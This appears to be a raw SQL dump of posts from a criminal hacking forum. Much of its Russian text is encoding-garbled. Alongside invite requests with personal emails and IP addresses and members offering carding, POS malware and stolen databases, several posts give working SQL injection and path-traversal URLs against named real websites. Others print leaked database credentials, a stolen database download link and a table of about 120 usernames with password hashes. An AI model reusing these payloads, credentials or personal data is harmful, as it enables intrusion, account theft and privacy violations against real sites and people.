1101, 1183, 'w0rm', 1, '', 1404676870, 'Fixed, чõúðõü.', 1, 0, '178.44.231.197', 0, 1, 0, 0, 0), (1221, 1132, 0, 'Invite', 2, 'New invite', 1404694277, '[b]Name[/b]: 123\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 23\r\n [b]e-mail[/b]: 2321\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. You can also leave a jabber and other alternative addresses to communicate, in a word, everything that you think it necessary to bring to our attention. The minimum length of 200 characters, the maximum 4000.\r\n .', 1, 0, '178.44.186.142', 0, 1, 0, 0, 0), (1222, 1133, 0, 'Invite', 2, 'New invite', 1404776933, '[b]Name[/b]: Nickname\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: Email\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '178.45.192.201', 0, 1, 0, 0, 0), (1223, 1134, 0, 'w0rm', 1, 'фþрüð ÿþôðчø ÷ðÑÂòúø', 1404782723, '[url]https://w0rm.in/index.php?site=joinus[/url]\n\nØ÷üõýøû òýõшýøù òøô+ ÿрøúрутøû úðÿчу ýð рðôþÑÂть ðúуýõúøúÑÂýыü хðúõрðü.', 1, 0, '178.44.232.204', 0, 1, 1, 0, 0), (1224, 1083, 1151, 'Bo0om', 7, '', 1404788657, '[QUOTE=unknown_evil;1150]ÃÂуöýð рðñþчðѠSql øûø ôðüÿ ñð÷ы?[/QUOTE]\r\n\r\náúуÃȄÂ\r\n\r\n[QUOTE=unknown_evil;1151]Òþт ýþрüðûьýðѠÑÂúуûѠòÑÂõ ôþÑÂтðõтÑÂѠýð ãà ð!\r\n[/QUOTE]\r\n\r\n\r\nÓрðц, ÑÂûøòðù, ÿøшø ò öðñу, [email]mb@exploit.im[/email]\r\nрð÷óþòðрøòðù þ цõýõ.', 1, 0, '176.209.48.92', 0, 1, 0, 0, 0), (1586, 1437, 0, 'Invite', 2, '{$name}', 1407956085, '[SIZE=\'4\'][COLOR=\'Sienna\']Google[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: pascalorangina@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 180.28.251.16\n[*][b]real ip[/b]: 180.28.251.16\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/0E06A0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : google : y14mer@hotmail.com : : 2198469cc649add6e62dc9ea1fafd187\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://google.org | google.org \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1359, 1083, 1292, 'BigBear', 34, '', 1407360508, '[url]http://rakuten.co.jp[/url]\r\n[url]http://www.caribbeancom.com/index2.htm[/url] \r\n[url]http://550909.com/oni01[/url] [url]http://happymail.co.jp/[/url]\r\n[url]http://www.toranoana.jp/bl/[/url]\r\n[url]http://mosimosi.bz/bg/sp/?pr=rpg007[/url]\r\n[url]http://0783a.com/pc/02/?pr=nfo.c[/url]\r\n\r\nÞт 1ú ø òышõ.\r\n\r\nÃÂуöýы üыûьýøúø, üþöýþ òытÑÂýуть чõрõ÷ ÑÂúуûø ø тô ø тÿ.\r\n\r\nâþ, чтþ уöõ ÑÂüþó ýðùтø.\r\n\r\n[url]http://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../../etc/passwd%00.jpg[/url]\r\n\r\n[url]http://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../../web/cgi-bin/login.cgi%00.jpg[/url]\r\n\r\nrequire \"/web/plib/R2/libcommon.pl\";\r\nrequire \"/web/plib/libenv.pl\";\r\nrequire \"/web/plib/libhtml.pl\";\r\nrequire \"/web/plib/R2/libcookie.pl\";\r\nrequire \"/web/plib/R2/libdatabase.pl\";\r\nrequire \"/web/plib/sql_regist.pl\";\r\nrequire \"/web/plib/libutil.pl\";\r\nrequire \"/web/plib/jcode.pl\";\r\nrequire \"/web/plib/librate.pl\";\r\nrequire \"/web/cgi-bin/get_hosp.pl\";\r\nrequire \"/web/cgi-bin/get_cgi_frame_templ.pl\";\r\n\r\n# $Id: libdatabase.pl 60 2005-07-07 11:58:38Z funa $ #\r\n\r\nmy $FMOS_IP=\"FMOS\";\r\nmy $FMOS_ID=\"ectora\";\r\nmy $FMOS_PW=\"ec2004\";\r\n\r\nmy $IMOS_IP=\"IMOS\";\r\nmy $IMOS_ID=\"ectora\";\r\nmy $IMOS_PW=\"ec2004\";\r\n\r\nmy $FMOSR_IP=\"FMOSR\";\r\nmy $FMOSR_ID=\"ectora\";\r\nmy $FMOSR_PW=\"ec2004\";\r\n\r\nßþ ôруóøü рõÑÂурÑÂðü - SQL øýъõúцøѠтþûьúþ ò ÑÂтþü.\r\n\r\n[url]http://www.caribbeancom.com/ranking_v2.php?cat_id=4+and+1=2+union+select+1,2,3,444,concat(\'00\',0x3a,version()),666,777,888,999,10+--+[/url]', 1, 0, '91.105.185.0', 0, 1, 0, 0, 0), (1226, 1136, 0, 'Invite', 2, 'New invite', 1404809228, '[b]Name[/b]: traliaaaaa\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: irmansassz@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '78.60.193.34', 0, 1, 0, 0, 0), (1228, 1138, 0, 'w0rm', 1, 'AntiDDoS', 1404883312, 'ÃÂðÑÂтрþøû ÑÂõрòõр, Ñ€ÑÂô ÿрþóрðüýых +ÿõрõúþýфøýурðцøѠÑÂôрð + ýðÑÂтрþùúð iptables, ÿþúð òыôõрöøòðõü DDoS.', 1, 0, '95.71.228.124', 0, 1, 0, 0, 0), (1229, 1139, 0, 'Invite', 2, 'New invite', 1404937164, '[b]Name[/b]: PurePass\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: purepass@jabber.no\r\n [b]e-mail[/b]: PurePass@inbox.com\r\n [b]Info[/b]: sqlmap, vega, nmap, zenmap, arachni, w3sf and many pentest tools. html, php designer and pentester 8 years old...\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '151.236.19.87', 0, 1, 0, 0, 0), (1233, 1142, 0, 'mb1', 25, 'cinemablend.com', 1405026721, 'ÃÂуöýþ рðÑÂхõшøть ø ÷ðûøть шõûû. âрðф ÿþôõûøü.\r\n\r\n[url]http://www.cinemablend.com/admin/features_view.php?cid=6[/url] \r\n\r\n\r\nDatabase: filmhobb_engine\r\nTable: users\r\n[123 entries]\r\n+------------------------------------------+---------------------------+-------\r\n-+\r\n| pass | login | level\r\n|\r\n+------------------------------------------+---------------------------+-------\r\n-+\r\n| 3b31d3ad5c2f7e40bbd94ab82294d8f977bbd6eb | filmhobbit | a\r\n|\r\n| 4fd59b289e1a8049fe9aa341dec5f0adb1eacd81 | mattnorris | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rrafe | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rbzzz | w\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rnewsreporter | r\r\n|\r\n| a43a94343913cebf55991fd4de89092995328bd3 | rhandynet | wr\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | r | w\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rretiredbryce | r\r\n|\r\n| a2a44222752854225809d6253b057050c16ba5d8 | RETIREDrstuart | re\r\n|\r\n| 1a7f188adf52fc676cc970eac52d068b17c21da2 | RETIRED - rInto | r\r\n|\r\n| 292dccba02d72fb02390b2d2e727743ff47b7b40 | Rlecari | r\r\n|\r\n| 7c4c7e94ce5a0da4810bd79310202c1f612cc624 | scott | ne\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rretiredsandy | w\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rfredretired | r\r\n|\r\n| 70c8feacb7c00e556156caed2d79d90c34a000c3 | rmargaret | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rlexi | r\r\n|\r\n| 68c6cc627e9392612837c7c43b6e1a664550d4b8 | kelly | a\r\n|\r\n| 662be2b09a6db9471e92dc195581f9ff1db054fc | redwardp | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rretiredmichael | r\r\n|\r\n| 6c2c9e03aefd5bd0aea3bc38d0542dd41b07ee83 | rrdavidwharton | r\r\n|\r\n| 94d8fd46b751e0ce5b4f88bb7a813601df6d1a24 | rjasonmorgan | wr\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rRETIREDedwarddarell | w\r\n|\r\n| a69c3de8a972a4aaa5e9169680e2c0d591af9420 | rmatts | wr\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rRETIRED - nikkipierce | r\r\n|\r\n| a12380c0112978bbe7d4095b1622eddb7ebb8837 | rkateyrich | w\r\n|\r\n| b77868c9c5dd41a0c6351d5f6a67e13361222146 | richknight | wr\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rbrianlisi | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rjoncostantino | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rjaradwilk | w\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rtimpeterson | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rjeffrichard | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rchristinatrischetti | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rjaneboursaw | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rjdmcnamara | wr\r\n|\r\n| cf84ed447d7127e649e5a84de3b0ab35fcdcef5c | rmonicacastillo | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rretiredfelixvasquez | w\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rjeffharris | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rtimberinger | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rremarahman | r\r\n|\r\n| e4775e5fbe65bc451e2c4d8cc29d5fd69b16e4c7 | petehaas | se\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rmarianamcconnell | wr\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rjonathanstulce | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rpeterkimmich | r\r\n|\r\n| 1fee7112f4b0f1910116234e33b46533d3c9d754 | jessicagrabert | ae\r\n|\r\n| bac1ce497b1a27049244369565aef7767244d083 | rdvdnews | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rRETIREDlorikapes | w\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | ramandamacarthur | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rphilipcheung | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rglenboyd | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rdvdreviewer | w\r\n|\r\n| 77b577c24b2b608ac581e3f1ba958faf08616797 | rdustinchristian | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rerindougherty | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rcbstaff | r\r\n|\r\n| 0fe178f9f5d08fbf40acb9754e13455a3455259b | rffafawfasdfasdfgaming | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rretiredalexandra | w\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rretiredblairschulman | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rretiredbrian | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rretiredbrendan | wr\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rmichaelholcomb | w\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rfrancktabouring | w\r\n|\r\n| 3b7ef9a7e75f76560c2efabab15e4af76974dfd9 | rlogan | r\r\n|\r\n| 5b945a43d7b109b61523b40f8126d455946c4cd4 | mackrawden | ae\r\n|\r\n| 654c3e776acf7cfb4f60c617019dfc34a37d7829 | fpop | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rjohngormanRETIRED | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rRETIRED - ian | r\r\n|\r\n| 46e696b38179763eaf314ae5bcaa2895cd4a4756 | steve | r\r\n|\r\n| 1b90f7d3f7945247d1d68c97da97c711df6f73d3 | williamusher | se\r\n|\r\n| 022fb76872f91a9926247733002cea3a70f13bee | rmusic | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rkonagallagher | r\r\n|\r\n| 76cb0d5f48822cf48fc58c7019496b10115bf029 | rtv | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rjoshspiegel | r\r\n|\r\n| 53aad0ab6bd1a010308b5bc300c913b5e3e1ea3a | rbrianholcomb | w\r\n|\r\n| 888ebcfac35fe9957b0885e85f17cfdd25f53197 | rtech | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rRETIREDdanielsolomon | w\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rcharmaindennis | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rmarceastman | w\r\n|\r\n| befa372d104a687b5acc35508ec5ac2e01751938 | rperrinemiroff | wr\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | remilymcdonald | wr\r\n|\r\n| ffecf2903c92276525634932aebf3d1dc4974849 | zblank | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | randykeener | r\r\n|\r\n| 272a7e18d8decab812805fda168493fa5604bbe6 | dougnorrie | wr\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rryanrigney | wr\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rtimgomez | wr\r\n|\r\n| 4f8cf4317e7f5a49b8ec2869b209549de824f56a | rrpeterclines | w\r\n|\r\n| 09c69e6a2e18cc7d5fa9bc5586c1599fc9b213cc | nicvenable | se\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rjasonhughes | wr\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rrobinburdge | w\r\n|\r\n| ee1231ac17bfc9d2f9fd4d7876d323454c97b8d0 | rwillleblanc | wr\r\n|\r\n| 1701dd9b7472358c48ca0e699b8043e262c468c8 | ericeisenberg | ae\r\n|\r\n| e7f0c227cb5ef72d8edd8add05db6d9191af930d | jessecarpe | wr\r\n|\r\n| e1281c7f48bafd243b0551d895e00d513d1fa7d2 | rJacobASundstrom | r\r\n|\r\n| 96e2a411f3e3fad44bbe34b1edc226a6dafaa7f4 | rblank | r\r\n|\r\n| e6566eaf5a1810629a035d28aacc30f3fa064b74 | rJohnElliot | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rAndrewStewart | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rMikelaFloyd | r\r\n|\r\n| 5b4f1187e8d3554ad20e2f1946d453dd26a975df | rPatrickHodges | r\r\n|\r\n| 5212cce5ae4b2d601f88803810dd2298b6033912 | sean | ae\r\n|\r\n| 0264c025906e9442cc770648a897b30644ace6ff | josephgiannone | r\r\n|\r\n| 23c816ba47c09254c55a67e3525aa6c2ea70e31d | rmelissaduko | r\r\n|\r\n| c7953e988b5e8fd1dbebb3417451fb6e25062be4 | zacharyscheer | w\r\n|\r\n| 7449a2bed195073a29d7303801d5f92248c6c6fa | RETIRED lesliekasperowicz | r\r\n|\r\n| 1ff6aaf2af9b7c165c5f34b94e0b572193c353c0 | rscottheisel | r\r\n|\r\n| 162a0b0498d7bb37e61dd5a49bc7ee4fcb99948a | rmikemoody | r\r\n|\r\n| 29220f2165747f78c2032b8eb493d5c282608192 | rbriansalisbury | r\r\n|\r\n| ab24d1a73869567142723b272d79309214e6a219 | retiredcarrie | wr\r\n|\r\n| cb329cf93f64b596bc72241ce38ce404a7aa7e72 | kristypuchko | wr\r\n|\r\n| 3958916a359fe28e623c6236c950da3bc826351d | amydeline | re\r\n|\r\n| 8b597cb96ac9a27081fb83b1538bb2af3f485195 | remattpatches | wr\r\n|\r\n| dda7d2c914a6ec7cf5df9b49f2171500f8af4a8c | redavidehrlich | wr\r\n|\r\n| 7121cbefa6855442dec2b33466d67574f28d9b28 | reda7egonzales | wr\r\n|\r\n| 51dc70e30e36ea6b03ff7462b11cde579fd15af5 | face3 | a\r\n|\r\n| d146191f5a8e309d86db1e188881bf5ff5f6b338 | Rzakislam | wr\r\n|\r\n| 65767013093051f57080d37457a24a2e37bf324d | ryanwinslett | wr\r\n|\r\n| 5f578eb4539aaae067ed803c937d2ed8742f48f9 | handynet | r\r\n|\r\n| 3af192171fece6f52ebe9bd22521a485712b54a7 | rbrittahanson | wr\r\n|\r\n| 700f1088dda4ea78d0dab6876d8cd7b430b2e6d0 | RETIRED - ryangowland | r\r\n|\r\n| 053c579ed61bbf59dd5c40ed56fa9509d3805b01 | alicialutes | se\r\n|\r\n| a6748ccbb0618bb4fc5f267f0441f97676376e91 | gabrieltoro | wr\r\n|\r\n| 7b1e6f8859c5d269d282800b5cb5b8b68c077f0f | ralexsuskind | wr\r\n|\r\n| 3e43b3813fc5a846a350fad1dab6895a8fb63865 | mikereyes | wr\r\n|\r\n| 6101307044ab5d8e84a4ab8a5362d7d9091e9416 | courtneyflannery | r\r\n|\r\n| 5af77a048b5c6bc81c00eab2683e8dd0c424b028 | mickjoest | r\r\n|\r\n| 495f89c14c1fba8ec0005b114056a59ee2c0cb3f | blankt435t5yopu89 | r\r\n|\r\n+------------------------------------------+---------------------------+-------', 1, 0, '37.235.62.127', 0, 1, 0, 0, 0), (1234, 1067, 1086, 'Psych0tr1a', 11, '', 1405068941, 'üуÑÂúуû ÿþôýÑÂûø. ÿþüþóøтõ шõûû ÷ðûøть ÿûø÷.', 1, 0, '91.78.172.29', 0, 1, 0, 0, 0), (1235, 1143, 0, 'Invite', 2, 'New invite', 1405100097, '[b]Name[/b]: samirsamo123@\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: samirsamo123@jabber.com\r\n [b]e-mail[/b]: samirsamo123@jabber.com\r\n [b]Info[/b]: ddddddddddddddddddddddddddddddddddddddddddddddd .', 1, 0, '213.207.61.39', 0, 1, 0, 0, 0), (1236, 1067, 1086, 'kx00', 6, '', 1405111094, '[QUOTE=Psych0tr1a;1086][B]SQL injection[/B]\n[code]http://g4.thaimail.com/new/market/sub_category.php?cateID=999999999.9+union+select+1,2,user(),4,5,6,7,8+--+[/code]\n\nuser()=root@localhost\nFile_Priv=Y\n\nÃÂþ ÑÂãÚàMAGIC QUOTES = ON\n\n[/QUOTE]\n\nÒðрøðýт þñхþôð MAGIC QUOTES = ON\n_ttp://g4.thaimail.com/new/market/sub_category.php?cateID=999999999.9+union+select+1,2,concat(0x7e,0x27,load_file(0x2f6574632f706173737764),0x27,0x7e),4,5,6,7,8+--+\n\n\näðùû /etc/hosts ýð g4.thaimail.com\n[CODE]\n# $FreeBSD: src/etc/hosts,v 1.16 2003/01/28 21:29:23 dbaker Exp $\n#\n# Host Database\n#\n# This file should contain the addresses and aliases for local hosts that\n# share this file. Replace \'my.domain\' below with the domainname of your\n# machine.\n#\n# In the presence of the domain name service or NIS, this file may\n# not be consulted at all; see /etc/nsswitch.conf for the resolution order.\n#\n#\n::1 localhost localhost.my.domain\n127.0.0.1 localhost localhost.my.domain\n#\n# Imaginary network.\n#10.0.0.2 myname.my.domain myname\n#10.0.0.3 myfriend.my.domain myfriend\n#\n# According to RFC 1918, you can use the following IP networks for\n# private nets which will never be connected to the Internet:\n#\n# 10.0.0.0 - 10.255.255.255\n# 172.16.0.0 - 172.31.255.255\n# 192.168.0.0 - 192.168.255.255\n#\n# In case you want to be able to connect to the Internet, you need\n# real official assigned numbers. Do not try to invent your own network\n# numbers but instead get one from your network provider (if any) or\n# from your regional registry (ARIN, APNIC, LACNIC, RIPE NCC, or AfriNIC.)\n#\n192.168.110.8 g4.thaimail.intra g4\n203.148.250.170 g4.thaimail.com\n192.168.110.1 g1.thaimail.intra g1\n192.168.110.11 db.thaimail.intra db\n192.168.110.7 g2.thaimail.intra g2\n192.168.110.201 st1.thaimail.intra st1\n192.168.110.202 st2.thaimail.intra st2\n[/CODE]\näðùû /etc/hosts ýð ÑÂõрòõрõ ñð÷ы MySQL\n[CODE]\n# $FreeBSD: src/etc/hosts,v 1.16.32.1 2009/04/15 03:14:26 kensmith Exp $\n#\n# Host Database\n#\n# This file should contain the addresses and aliases for local hosts that\n# share this file. Replace \'my.domain\' below with the domainname of your\n# machine.\n#\n# In the presence of the domain name service or NIS, this file may\n# not be consulted at all; see /etc/nsswitch.conf for the resolution order.\n#\n#\n::1 localhost localhost.my.domain\n127.0.0.1 localhost localhost.my.domain\n192.168.110.11 db1 db1.thaimail.intra\n\n#\n# Imaginary network.\n#10.0.0.2 myname.my.domain myname\n#10.0.0.3 myfriend.my.domain myfriend\n#\n# According to RFC 1918, you can use the following IP networks for\n# private nets which will never be connected to the Internet:\n#\n# 10.0.0.0 - 10.255.255.255\n# 172.16.0.0 - 172.31.255.255\n# 192.168.0.0 - 192.168.255.255\n#\n# In case you want to be able to connect to the Internet, you need\n# real official assigned numbers. Do not try to invent your own network\n# numbers but instead get one from your network provider (if any) or\n# from your regional registry (ARIN, APNIC, LACNIC, RIPE NCC, or AfriNIC.)\n#\n[/CODE]\nшõûû чõрõ÷ SQLi þтÿðôðõт ýуöýþ úрутøть чõрõ÷ LFI. \nßутø ú ûþóðü ýуöýы.', 1, 1, '5.57.14.216', 0, 1, 0, 0, 0), (1237, 1067, 1236, 'kx00', 6, '', 1405115800, '[CODE]GET http://g4.thaimail.com/index-top.php?auth_error=-4&backto= HTTP/1.1\r\nHost: g4.thaimail.com\r\nAccept: */*\r\nAccept-Language: en\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\r\nConnection: close\r\nCookie: CGateProWebUser=xd6GxdzQFgwbtBuaLkRe; PHPSESSID=nvmqhg7o4glsltq1g16u53dl27; theme=../../../../../../usr/local/etc/apache22/httpd.conf%00; lang=th_TH; cookie_test_1=test; cookie_test_2=test[/CODE]\r\n\r\nCustomLog \"|/usr/local/sbin/rotatelogs /var/log/httpd-access.log.%Y%m%d 86400\" common<= рþтðцøѠûþóþò. ÿõчðûь.\r\nErrorLog /var/log/httpd-error.log\r\n/etc/newsyslog.conf чтþ-тþ òþ÷üþöýþ ÿþûõ÷ýþõ...', 1, 1, '5.57.14.216', 0, 1, 0, 0, 0), (1238, 1144, 0, 'Invite', 2, 'New invite', 1405264488, '[b]Name[/b]: LeNo\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: l3n0@darkode.com\r\n [b]e-mail[/b]: xgurux@outlook.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '182.64.238.177', 0, 1, 0, 0, 0), (1239, 1145, 0, 'w0rm', 1, '.blackhatworld.com', 1405265072, '[url]http://www.blackhatworld.com/blackhat-seo/forum.php[/url]\n\ndownload:[url]https://cloud.mail.ru/public/0530624c3e21/black.sql[/url][URL=\"https://cloud.mail.ru/public/0530624c3e21/black.sql\"][/URL]', 1, 0, '178.45.207.171', 0, 1, 0, 0, 0), (1240, 1146, 0, 'Invite', 2, 'New invite', 1405276155, '[b]Name[/b]: Rome0\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: Rome0@143biz.cc\r\n [b]e-mail[/b]: anonymous13@hush.com\r\n [b]Info[/b]: Hello , i am Rome0 , well know seller of dumps in many forum .\r\nMostly work on Pos malware and real carding sh!!t \r\nWish some of us know me and can vouch me into w0rm .', 1, 0, '94.242.198.91', 0, 1, 0, 0, 0), (1241, 1147, 0, 'Invite', 2, 'New invite', 1405277915, '[b]Name[/b]: badboy\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: mi1im@jabber.cz\r\n [b]e-mail[/b]: pham1331@yahoo.com\r\n [b]Info[/b]: Hello, I am around underground since 2006 back in days of m00/DHG russian underground stuff. Was/am registered on the forums vendors(DC now) darkode. Retired from big hacking for few years, buying selling information and converting oppratunity into $.\r\nbadboy is darkode nickname altho I do not have presistant one.\r\n\r\nRegards. .', 1, 0, '178.254.218.116', 0, 1, 0, 0, 0), (1242, 1148, 0, 'Invite', 2, 'New invite', 1405324090, '[b]Name[/b]: scrack\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 2435678\r\n [b]e-mail[/b]: sean.collins43@yahoo.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '186.150.15.127', 0, 1, 0, 0, 0), (1243, 1149, 0, 'Invite', 2, 'New invite', 1405324593, '[b]Name[/b]: johnnyb\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: johnnyb@exploit.im\r\n [b]e-mail[/b]: johnnyb2014@mailinator.com\r\n [b]Info[/b]: I am skilled with exploit kits, use of web exploits and malware. I am interested in buying DBs of various types from people..', 1, 0, '111.90.159.40', 0, 1, 0, 0, 0), (1244, 1150, 0, 'Invite', 2, 'New invite', 1405358185, '[b]Name[/b]: a7515887\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 2322\r\n [b]e-mail[/b]: a7515887@drdrb.net\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '108.59.11.116', 0, 1, 0, 0, 0), (1246, 1067, 1237, 'Psych0tr1a', 11, '', 1405414697, 'çøтðù ôðûõõ тðü õÑÂть ÑÂúуÃȄʄÂûõÿðѠчõрõ÷ úþтþрую üþöýþ ÷ðûøтьÑÂÑÂ. тðú úðú MQ = off\r\n ÃÂþ ýуöýы õщё ÿðÿúø.', 1, 0, '79.139.175.194', 0, 1, 0, 0, 0), (1247, 1152, 0, 'Invite', 2, 'New invite', 1405462166, '[b]Name[/b]: main5tream\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 396419\r\n [b]e-mail[/b]: main5tream@secure-mail.biz\r\n [b]Info[/b]: Ex-Smod Hackerzhub\r\nEx-Admin @ Hackbase\r\nAdmin @ UniqueCrew\r\n\r\nI am Admin of the biggest hacking security linkbase of the world :\r\n\r\nlink-base.org\r\n\r\nand websec blog\r\n\r\nhttps://blog.yakuza112.org/\r\n\r\nSkills\r\n\r\nWebpsec/ some PHP / c++ / vb.net knowledge,pawno coding, Malware, WordPress, Linux\r\n\r\nI am team member @ Emsisoft.com (officialy \\\"Tester\\\" of new products ).', 1, 0, '93.228.132.63', 0, 1, 0, 0, 0), (1248, 1153, 0, 'Invite', 2, 'New invite', 1405484713, '[b]Name[/b]: illuminati\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: mastermind@jabber.se\r\n [b]e-mail[/b]: kappel86@gmx.ch\r\n [b]Info[/b]: I\\\'m an Entrepreneur who liked Captain Power and the Soldiers of the Future. ;).', 1, 0, '108.61.210.77', 0, 1, 0, 0, 0), (1249, 1154, 0, 'Invite', 2, 'New invite', 1405489446, '[b]Name[/b]: h4\\\\\r\n 